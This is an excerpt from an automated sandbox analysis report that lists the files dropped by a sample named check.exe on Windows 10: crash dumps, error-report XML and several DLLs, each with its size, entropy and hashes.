                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):1.360186894118187
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:RC7TuBS0PRjyjoRXgvvi7g2GZUExN+r5L6Gvn0vT21xwnGKYt+tOVIOv1SnYzuii:07SBZPRjyj8Hwn7yRzuiFIY4lO8F
                                                                                                                                                                                                                                      MD5:9CF6CC27A236CFE78B048B2A020DF276
                                                                                                                                                                                                                                      SHA1:3B3A0DD400919A5CCFAE8D78EC649F544473F638
                                                                                                                                                                                                                                      SHA-256:96CFB67537BAE798A34A96CB3F3D7781C40D44D7876E74BA7644E4F7F42B7DEE
                                                                                                                                                                                                                                      SHA-512:F793D2F8345BB7CC37C0751AF448224C9F2A73847F5BBF58FC8575252FFC6A89636A6930DE9347163440D9AD0D4A45CAD5C5E8AEE35227B7BA19565047CCB77C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):1.3590099566284821
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:NvTTu6hS0PRjyjoRXBeuL7pfngN9uNnqQyDnUn9WSfEownGTY0PchVIhv1SnYzuP:RSEZPRjyjMfwnyNRzuiFIY4lO8F
                                                                                                                                                                                                                                      MD5:E6568BEF7E898F6313931308658388AD
                                                                                                                                                                                                                                      SHA1:FC6E0A9132F2B8F2B105F52E5DB450096CCB0E5B
                                                                                                                                                                                                                                      SHA-256:58029F733E3EC5BD9968E46A7A5DED1E6458B3A3EB8DB196190F993615DB71BF
                                                                                                                                                                                                                                      SHA-512:8B9082573BF107B5E9806BA09D3EEA708FDDF72A2AFDAB0D6E8353B952BC11B9B788BA58778B2C50FF2F308D7C1CE15236873F798B69F15DA21B954D5602B1CC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                      Entropy (8bit):1.3589472856966842
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:gZ9TubS0PRjyjoRX3oYN7PZxGL9CNd8WUFxunbwkZyuwnGVYyBKXVIXv1SnYzuii:sSbZPRjyjM/wn0zRzuiFIY4lO8F
                                                                                                                                                                                                                                      MD5:5CF76CED084713EEB609FD47E9001D3F
                                                                                                                                                                                                                                      SHA1:B8F6E7D3ED1ED44DB743DD72AC3657A7B1519FA1
                                                                                                                                                                                                                                      SHA-256:4F91AFC81ED5C6A1BFAA089B3776368B1FF7C2DD7D261B86D7324DAFAD2943B5
                                                                                                                                                                                                                                      SHA-512:AC3AC03ACD5F2C10628F025F0B6C0A09E70F2ED4A4EFB178B1C1DD515B3651EFE5584976B7D90E7CC789BFB87245F1F7E61A61D0DA46AECB70D954B2BC1995C6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.0.2.3.9.4.5.2.1.3.6.6.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.0.2.3.9.4.5.9.1.6.7.8.5.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.0.4.f.f.0.5.1.-.a.8.a.a.-.4.8.f.4.-.9.c.e.9.-.3.1.5.f.8.8.1.7.5.0.a.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.b.b.9.c.3.7.-.f.6.d.7.-.4.3.d.5.-.9.0.b.d.-.d.b.f.8.6.4.2.4.5.3.f.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.1.8.-.0.0.0.1.-.0.0.1.4.-.8.0.8.a.-.7.c.3.c.6.b.4.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.f.2.5.9.9.8.8.8.5.a.e.0.c.f.7.b.d.e.0.3.3.2.8.a.5.2.9.7.a.d.8.8.f.c.c.4.2.8.0.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.5.:.0.6.:.2.4.:.3.2.!.2.4.f.
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Sat Dec 7 05:45:34 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):133986
                                                                                                                                                                                                                                      Entropy (8bit):2.0284071324005004
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:opYZurEZXUWfGPGASGqPC6SXtEuJ81jc6bgFL:JZLGPf4o6jc6bKL
                                                                                                                                                                                                                                      MD5:77086A928E3751F3D79BAD8804280745
                                                                                                                                                                                                                                      SHA1:6A68775C029D727CCBB3AFEC8E36680DDEAD6344
                                                                                                                                                                                                                                      SHA-256:DBD1A3450BE7506C87518CFB24E3B8E04A42C3C7BEC02365CAB0B0037838C8A6
                                                                                                                                                                                                                                      SHA-512:093F7D318A09F577E20688769503C26113A80481A8C165739EDAFA792ADFE4A834F2532E90B011D44318517EED42F30892D5A2F55997709774792C988F284FCC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9602
                                                                                                                                                                                                                                      Entropy (8bit):3.7053667833245085
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJJFxl6Yx/+jYgmfSZpDM89b5/FVfxTm:R6lXJ7T6YJ+jYgmfSF5NVfI
                                                                                                                                                                                                                                      MD5:EC63073453E1F8B4A5AE1EE33DB8B36D
                                                                                                                                                                                                                                      SHA1:425FE3E498C26FE5D839CF1036B91B62471BFCDE
                                                                                                                                                                                                                                      SHA-256:E09BCD7FFECA06E1B87677208A84DF4308EFA2AA7AF73D664E275E8154A1F648
                                                                                                                                                                                                                                      SHA-512:9CE0FBC1CB1365B9BDC77EF1183358E4DCF5B4E24BE729D2496B0C991E947BC21F279F8A52E22C871203B8AFE3F288A65BACE665133AB3EA4ED9445538E21EBC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.2.0.<./.P.i.
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4735
                                                                                                                                                                                                                                      Entropy (8bit):4.434087248556981
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zs6Jg771I9JGWpW8VYcYm8M4JvWDF0yq8vuWvtMZ9T1Sod:uIjfII76H7V4JOeW3vtMDT1Sod
                                                                                                                                                                                                                                      MD5:5B71814302FA6F90E096844E7AE05295
                                                                                                                                                                                                                                      SHA1:0CE0BA1913DAB480DE1DA1B16687B76443097FB6
                                                                                                                                                                                                                                      SHA-256:CDB3BDC1F818CE5AB12B909E3920E9DCF77B0D0E950EA5E975261E94F976E204
                                                                                                                                                                                                                                      SHA-512:C505AA9F555B0B4C258E0246F830A606A68D810EE7E1224F02EE86F51010D7C71B5A1224D9462FD6C5C3458A8A9789D63E8277ED97A453AD36AC4685BBDB97F3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="620448" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Sat Dec 7 05:45:45 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):133520
                                                                                                                                                                                                                                      Entropy (8bit):2.043807567082314
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:I7yYcL8ur0icbSGdMbAh2nME+ZR/hlfrE/:I7PisSGdRWME+ZR/hlD
                                                                                                                                                                                                                                      MD5:867EA2CD430300CA72431218D23AB481
                                                                                                                                                                                                                                      SHA1:54BC311775A15A4719C123AA5D2C81CE5CE85D1F
                                                                                                                                                                                                                                      SHA-256:0F5B7EE5F4AF5BABB15A6A1DE564CAA28893BB5BF96279687123538549B5189D
                                                                                                                                                                                                                                      SHA-512:2E19C77B678ED20B4A79036525468B4B3575F14A455C0B74270BC321E7D1AD194F639704D9A9C5F2AD0381EA2DAC57CCD29973990024B96FC53DA6F2BE5FF510
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9596
                                                                                                                                                                                                                                      Entropy (8bit):3.7082685011468044
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJyjqU6YmWKDDD4gmfSZpDp89b3Dourf3dm:R6lXJEqU6YaPD4gmfSa30urfQ
                                                                                                                                                                                                                                      MD5:0F0D1ADBED81D024F48DE3BBD65454F3
                                                                                                                                                                                                                                      SHA1:0E8CC636F06B5301E8685ADABAA5A57A069DA1C8
                                                                                                                                                                                                                                      SHA-256:2F02F2828B85B3E54BA02BE9A623D684907F6CB7D208A68631B315534F891C19
                                                                                                                                                                                                                                      SHA-512:41F1AD4994A964E7984E018D34AB2A4796EB229DEAAD1F738EDD05C4EF4D5A42AC60D28C5B441377F5D3A4D266C7F906D3F1AB93A292F16375EC1683F28BF68E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.0.8.<./.P.i.
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4735
                                                                                                                                                                                                                                      Entropy (8bit):4.435611795160004
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zs6Jg771I9JGWpW8VY4vYm8M4JvWDFOyq8vuWbMZ9T1S2ed:uIjfII76H7V6JOsW3bMDT1S2ed
                                                                                                                                                                                                                                      MD5:8AF5BA1C63E1E9C22AD959B17ABD79B1
                                                                                                                                                                                                                                      SHA1:31CF7323BD912B44233E99B7A864536F7DCAC716
                                                                                                                                                                                                                                      SHA-256:F21B1BA1CE2D93C2105A8C0E129A6EAEF0090437B1054BA01E0F08EACBE17DF0
                                                                                                                                                                                                                                      SHA-512:D9F272E4D778BE9E4321568C6687CC926ED5701AC751D8436C085DF3F30348947274509D3EAAA8491A44491608003E1651A0EAD4DE827213D6D3353E418439CC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="620448" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Sat Dec 7 05:45:54 2024, 0x1205a4 type
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):130856
                                                                                                                                                                                                                                      Entropy (8bit):2.083270167512342
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:LyYPurHcVC3sbRqBAcAcq7skUTHZ+qQBJcHl8KpQytSnb:LyYPursiEMBApcuvUTHZ+qqJu2kEn
                                                                                                                                                                                                                                      MD5:72E32473E24E4703AED8C37730B9D886
                                                                                                                                                                                                                                      SHA1:840DBB4EF61A5006D48B88A3CE7C3E0595EA372F
                                                                                                                                                                                                                                      SHA-256:FE363EAFE5C7E08660FF3DA1298D8A4235FFE6389F329D662952F5BABCEC1B69
                                                                                                                                                                                                                                      SHA-512:9ACAD1C2717F91BEDCD3AA670112475500BF4CB6A7A9405533AF2B85B1B4A9869D85C6E717B9ABE995B9E63933B1C531A8E2A0C8CAA17BD1DB7224597E3FDFF8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):9596
                                                                                                                                                                                                                                      Entropy (8bit):3.7097311883528126
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJZuz6YIkJb4gmfSZpDa89bfqqVfDVm:R6lXJwz6YbJb4gmfSPfRVf8
                                                                                                                                                                                                                                      MD5:E3F5328E567AF007CD843CFB0B2376C7
                                                                                                                                                                                                                                      SHA1:ACE39A10E3BFB75A27F50C735C352C04890AB463
                                                                                                                                                                                                                                      SHA-256:2B6749CFACC879E4FAB10F73C07262DCFCA9F25AD2AAA0F87D97346A859329BA
                                                                                                                                                                                                                                      SHA-512:340C9842E2A6EAC4EC3660935EB3D79450ACD93C5546CC0FABD57C443077357A408530FA5AA4499F9FF82D03377AB4D484873053C6B88E7605C386B368E1B36A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>5300</Pi
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4735
                                                                                                                                                                                                                                      Entropy (8bit):4.433977197321253
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zs6Jg771I9JGWpW8VY7Ym8M4JvWDFtyq8vuWfMZ9T1SNd:uIjfII76H7VHJO3W3fMDT1SNd
                                                                                                                                                                                                                                      MD5:FC6238894838F914DDCBCA34FC04816A
                                                                                                                                                                                                                                      SHA1:A1462249ED45D04FA39D9029720640D3F72962A3
                                                                                                                                                                                                                                      SHA-256:765B297E990BB4343FAC0F1F1E17C5BD2B0B980B581D5DA92A1A6BBE1A5D600E
                                                                                                                                                                                                                                      SHA-512:454F1C4E7E054E42B4671C3477702C1C4822331A444D1E57C330DEA6EAF7875A140970A56B9DD6DC6EAFDFAC9D1D38ECAEFE6A4B614DD0BA8452EFBBA9577861
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="620448" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1464
                                                                                                                                                                                                                                      Entropy (8bit):5.325182232108426
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:3VOSKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9txNBJt/NKwJ0hNuTx9r8Hv9ILAl/:YSU4y4RQmFoUeCamfm9qr9trBLNGhNuw
                                                                                                                                                                                                                                      MD5:FCACE08ED629CC3A882DE42D909B39CA
                                                                                                                                                                                                                                      SHA1:7BDB27DB0ECBED1D57951EFC2624ABF8EFF540A9
                                                                                                                                                                                                                                      SHA-256:73FDD8B7F605172EC3673B7980EC9AF7A29D6CE4036C7E1D344613CD4A6ADB10
                                                                                                                                                                                                                                      SHA-512:D3F074FE3837792ED7D13EADC5472CB458F143B071ECC3986B6CA9809F27E7B7441C6C37AD121FE20B874BDD7A04C6A26CFB83BEFEE7E00C80EB7ECEF3344D4B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):590112
                                                                                                                                                                                                                                      Entropy (8bit):6.461874649448891
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:xI88L4Wu4+oJ+xc39ax5Ms4ETs3rxSvYcRkdQEKZm+jWodEEVh51:xD89rxZfQEKZm+jWodEEP5
                                                                                                                                                                                                                                      MD5:01B946A2EDC5CC166DE018DBB754B69C
                                                                                                                                                                                                                                      SHA1:DBE09B7B9AB2D1A61EF63395111D2EB9B04F0A46
                                                                                                                                                                                                                                      SHA-256:88F55D86B50B0A7E55E71AD2D8F7552146BA26E927230DAF2E26AD3A971973C5
                                                                                                                                                                                                                                      SHA-512:65DC3F32FAF30E62DFDECB72775DF870AF4C3A32A0BF576ED1AAAE4B16AC6897B62B19E01DC2BF46F46FBE3F475C061F79CBE987EDA583FEE1817070779860E5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                      • Filename: check.exe, Detection: malicious
                                                                                                                                                                                                                                      • Filename: check.exe, Detection: malicious
                                                                                                                                                                                                                                      • Filename: az10.exe, Detection: malicious
                                                                                                                                                                                                                                      • Filename: Update_4112024.exe, Detection: malicious
                                                                                                                                                                                                                                      • Filename: Update_4112024.exe, Detection: malicious
                                                                                                                                                                                                                                      • Filename: PyQtScrcpy.exe, Detection: malicious
                                                                                                                                                                                                                                      • Filename: PyQtScrcpy.exe, Detection: malicious
                                                                                                                                                                                                                                      • Filename: active.exe, Detection: malicious
                                                                                                                                                                                                                                      • Filename: PumpBotPremium.msi, Detection: malicious
                                                                                                                                                                                                                                      • Filename: Bypass Apk.exe, Detection: malicious
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):31728
                                                                                                                                                                                                                                      Entropy (8bit):6.499754548353504
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:rOY/H1SbuIqnX8ndnWc95gW3C8c+pBj0HRN7bULkcyHRN7rxTO6iuQl9xiv:yYIBqnMdxxWd4urv
                                                                                                                                                                                                                                      MD5:0FE6D52EB94C848FE258DC0EC9FF4C11
                                                                                                                                                                                                                                      SHA1:95CC74C64AB80785F3893D61A73B8A958D24DA29
                                                                                                                                                                                                                                      SHA-256:446C48C1224C289BD3080087FE15D6759416D64F4136ADDF30086ABD5415D83F
                                                                                                                                                                                                                                      SHA-512:C39A134210E314627B0F2072F4FFC9B2CE060D44D3365D11D8C1FE908B3B9403EBDD6F33E67D556BD052338D0ED3D5F16B54D628E8290FD3A155F55D36019A86
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6023664
                                                                                                                                                                                                                                      Entropy (8bit):6.768988071491288
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:98304:hcirJylHYab/6bMJsv6tWKFdu9CLiZxqfg8gwf:+irJylHFb/QMJsv6tWKFdu9CL4xqfg8x
                                                                                                                                                                                                                                      MD5:817520432A42EFA345B2D97F5C24510E
                                                                                                                                                                                                                                      SHA1:FEA7B9C61569D7E76AF5EFFD726B7FF6147961E5
                                                                                                                                                                                                                                      SHA-256:8D2FF4CE9096DDCCC4F4CD62C2E41FC854CFD1B0D6E8D296645A7F5FD4AE565A
                                                                                                                                                                                                                                      SHA-512:8673B26EC5421FCE8E23ADF720DE5690673BB4CE6116CB44EBCC61BBBEF12C0AD286DFD675EDBED5D8D000EFD7609C81AAE4533180CF4EC9CD5316E7028F7441
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):436720
                                                                                                                                                                                                                                      Entropy (8bit):6.392610185061176
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:ZLvnUJ17UTGOkWHUe/W9TgYMDu96ixMZQ8IlXbKgp8aIDeN:KP7cGOGegTwu96ixMZQtlrPN
                                                                                                                                                                                                                                      MD5:0E8FF02D971B61B5D2DD1AC4DF01AE4A
                                                                                                                                                                                                                                      SHA1:638F0B46730884FA036900649F69F3021557E2FE
                                                                                                                                                                                                                                      SHA-256:1AA70B106A10C86946E23CAA9FC752DC16E29FBE803BBA1F1AB30D1C63EE852A
                                                                                                                                                                                                                                      SHA-512:7BA616EDE66B16D9F8B2A56C3117DB49A74D59D0D32EAA6958DE57EAC78F14B1C7F2DBBA9EAE4D77937399CF14D44535531BAF6F9DB16F357F8712DFAAE4346A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7008240
                                                                                                                                                                                                                                      Entropy (8bit):6.674290383197779
                                                                                                                                                                                                                                      Encrypted:false
